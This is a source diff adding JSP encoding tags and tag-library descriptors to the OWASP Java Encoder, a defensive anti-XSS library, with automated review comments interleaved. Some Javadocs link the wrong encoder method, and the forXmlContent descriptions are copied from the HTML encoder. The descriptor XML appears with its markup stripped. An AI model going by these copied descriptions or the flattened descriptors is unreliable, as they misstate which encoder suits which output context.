+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForUriComponentTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forUriComponent(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java
new file mode 100644
index 0000000..9b975f5
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform percent-encoding of a URL according to RFC 3986.
+ * This wraps the {@link org.owasp.encoder.Encode#forUri(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForUriTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forUri(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java
new file mode 100644
index 0000000..e2820d9
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java
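Review bot: The class Javadoc should carry the caveat that percent-encoding a whole URI per RFC 3986 does not, by itself, make an untrusted value safe to emit as an `href` or `src`: the scheme and its colon are legitimate URI characters that the encoder writes through unchanged, so this tag alone does not reject a value whose scheme is something other than the ones the page expects. Suggested addition to the Javadoc: `Encoding preserves the URI's scheme; validate untrusted values against an allow-list of schemes (e.g. http, https) before using this tag in a link or resource attribute.` Whether `Encode.forUri` documents this itself is outside this chunk, but the tag is the entry point JSP authors will read, so it should say so regardless. When the value is only a query parameter, path segment or similar fragment, `ForUriComponentTag` is the more conservative choice and the Javadoc could point readers to it.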
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform XML Attribute Encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForXmlAttributeTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forXmlAttribute(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java
new file mode 100644
index 0000000..fd3e0d5
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform XML Comment Encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForXmlCommentTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forXmlComment(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java
new file mode 100644
index 0000000..c5540ef
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java
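Review bot: The class Javadoc says this tag wraps `Encode#forXmlAttribute`, but `doTag` calls `Encode.forXmlComment`, so the link is a copy-paste leftover that sends readers to the wrong encoder; it should read `{@link org.owasp.encoder.Encode#forXmlComment(java.lang.String)}`. The ForXmlContentTag hunk below has the same mismatch, linking forXmlAttribute while calling forXmlContent. The tag-library descriptor entry for forXmlComment states that it is NOT for use with (X)HTML contexts because browsers may interpret comment content through vendor-specific extensions, and that restriction belongs in the class Javadoc as well, since that is what a JSP author will see when choosing the tag. `_value` is inherited from EncodingTag, which is outside this hunk.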
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform XML Content Encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForXmlContentTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forXmlContent(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java
new file mode 100644
index 0000000..ea9ebea
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform XML Encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forXml(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForXmlTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forXml(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/resources/META-INF/java-encoder-advanced.tld b/jsp/src/main/resources/META-INF/java-encoder-advanced.tld
new file mode 100644
index 0000000..becab48
--- /dev/null
+++ b/jsp/src/main/resources/META-INF/java-encoder-advanced.tld
@@ -0,0 +1,560 @@ + + + OWASP Java Encoder Project + 1.0 + java-encoder + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#advanced + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.tag.ForCDATATag + empty + + The value to be written out + value + true + true + java.lang.String + + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.tag.ForHtmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.tag.ForXmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.tag.ForXmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. 
+ + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.tag.ForJavaScriptTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + HTML script attributes (such as onclick). It is + NOT safe for use in script blocks. The caller MUST provide the + surrounding quotation characters. This method performs the + same encode as Encode.forJavaScript(String) with the + exception that / is not escaped. + + forJavaScriptAttribute + forJavaScriptAttribute + org.owasp.encoder.tag.ForJavaScriptAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + HTML script blocks. It is NOT safe for use in script + attributes (such as onclick). The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String)} with + the exception that " and ' are encoded as \" and \' respectively. + + forJavaScriptBlock + forJavaScriptBlock + org.owasp.encoder.tag.ForJavaScriptBlockTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + a JavaScript or JSON file. This method is NOT safe for + use in ANY context embedded in HTML. The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String) with + the exception that / and & are not escaped and " and ' are + encoded as \" and \' respectively. 
+ + forJavaScriptSource + forJavaScriptSource + org.owasp.encoder.tag.ForJavaScriptSourceTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.tag.ForUriTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.tag.ForCssUrlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. + (X)HTML comments may be interpreted by browsers as something + other than a comment, typically in vendor specific extensions + (e.g. &lt;--if[IE]--&gt;. + For (X)HTML it is recommend that unsafe content never be included + in a comment. 
+ + forXmlComment + forXmlComment + org.owasp.encoder.tag.ForXmlCommentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for HTML text attributes. + forHtmlAttribute + forHtmlAttribute + org.owasp.encoder.tag.ForHtmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.tag.ForHtmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.tag.ForXmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.tag.ForUriComponentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.tag.ForCssStringTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.Encode + java.lang.String forHtml(java.lang.String) + forHtml(unsafeData) + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. 
Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.Encode + java.lang.String forHtmlContent(java.lang.String) + forHtmlContent(unsafeData) + + + Encodes for HTML text attributes. + forHtmlAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlAttribute(java.lang.String) + forHtmlAttribute(unsafeData) + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlUnquotedAttribute(java.lang.String) + forHtmlUnquotedAttribute(unsafeData) + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.Encode + java.lang.String forCssString(java.lang.String) + forCssString(unsafeData) + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.Encode + java.lang.String forCssUrl(java.lang.String) + forCssUrl(unsafeData) + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. 
+ + forUri + forUri + org.owasp.encoder.Encode + java.lang.String forUri(java.lang.String) + forUri(unsafeData) + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.Encode + java.lang.String forUriComponent(java.lang.String) + forUriComponent(unsafeData) + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.Encode + java.lang.String forXml(java.lang.String) + forXml(unsafeData) + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.Encode + java.lang.String forXmlContent(java.lang.String) + forXmlContent(unsafeData) + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.Encode + java.lang.String forXmlAttribute(java.lang.String) + forXmlAttribute(unsafeData) + + + + Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. + (X)HTML comments may be interpreted by browsers as something + other than a comment, typically in vendor specific extensions + (e.g. &lt;--if[IE]--&gt;. + For (X)HTML it is recommend that unsafe content never be included + in a comment. + + forXmlComment + org.owasp.encoder.Encode + java.lang.String forXmlComment(java.lang.String) + forXmlComment(unsafeData) + + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. 
+ + forCDATA + forCDATA + org.owasp.encoder.Encode + java.lang.String forCDATA(java.lang.String) + forCDATA(unsafeData) + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. + + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.Encode + java.lang.String forJavaScript(java.lang.String) + forJavaScript(unsafeData) + + + + This method encodes for JavaScript strings contained within + HTML script attributes (such as onclick). It is + NOT safe for use in script blocks. The caller MUST provide the + surrounding quotation characters. This method performs the + same encode as Encode.forJavaScript(String) with the + exception that / is not escaped. + + forJavaScriptAttribute + forJavaScriptAttribute + org.owasp.encoder.Encode + java.lang.String forJavaScriptAttribute(java.lang.String) + forJavaScriptAttribute(unsafeData) + + + + This method encodes for JavaScript strings contained within + HTML script blocks. It is NOT safe for use in script + attributes (such as onclick). The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String)} with + the exception that " and ' are encoded as \" and \' respectively. 
+ + forJavaScriptBlock + forJavaScriptBlock + org.owasp.encoder.Encode + java.lang.String forJavaScriptBlock(java.lang.String) + forJavaScriptBlock(unsafeData) + + + + This method encodes for JavaScript strings contained within + a JavaScript or JSON file. This method is NOT safe for + use in ANY context embedded in HTML. The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String) with + the exception that / and & are not escaped and " and ' are + encoded as \" and \' respectively. + + forJavaScriptSource + forJavaScriptSource + org.owasp.encoder.Encode + java.lang.String forJavaScriptSource(java.lang.String) + + <%@page contentType="text/javascript; charset=UTF-8"%> + var data = '${forJavaScriptSource(unsafeData)}'; + + + \ No newline at end of file diff --git a/jsp/src/main/resources/META-INF/java-encoder.tld b/jsp/src/main/resources/META-INF/java-encoder.tld new file mode 100644 index 0000000..b761de0 --- /dev/null +++ b/jsp/src/main/resources/META-INF/java-encoder.tld 
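Review bot: The `forXmlContent` tag and function descriptions in this descriptor are copied from forHtmlContent ("Encodes for HTML text content... Use either forHtml or forHtmlAttribute for those methods"), so the descriptor documents an XML encoder as an HTML one and steers users toward HTML alternatives in an XML context; wording such as `Encodes for XML and XHTML text content. It does not escape quotation characters and is thus unsafe for use with XML attributes; use forXml or forXmlAttribute for those.` would match what ForXmlContentTag actually calls. The same copied text appears in the java-encoder.tld hunk that follows. Because the markup has been flattened in this view, I cannot tell whether the forXmlComment and forHtmlAttribute function entries, which list their name only once where every other entry lists it twice, are missing a display-name or a `<name>` element; that is worth checking against the file itself, since a function entry without a `<name>` would presumably not be callable from EL.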
@@ -0,0 +1,403 @@ + + + OWASP Java Encoder Project + 1.0 + java-encoder + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.tag.ForCDATATag + empty + + The value to be written out + value + true + true + java.lang.String + + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.tag.ForHtmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.tag.ForXmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.tag.ForXmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. 
+ + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.tag.ForJavaScriptTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.tag.ForUriTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.tag.ForCssUrlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for HTML text attributes. 
+ forHtmlAttribute + forHtmlAttribute + org.owasp.encoder.tag.ForHtmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.tag.ForHtmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.tag.ForXmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.tag.ForUriComponentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.tag.ForCssStringTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.Encode + java.lang.String forHtml(java.lang.String) + forHtml(unsafeData) + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.Encode + java.lang.String forHtmlContent(java.lang.String) + forHtmlContent(unsafeData) + + + Encodes for HTML text attributes. 
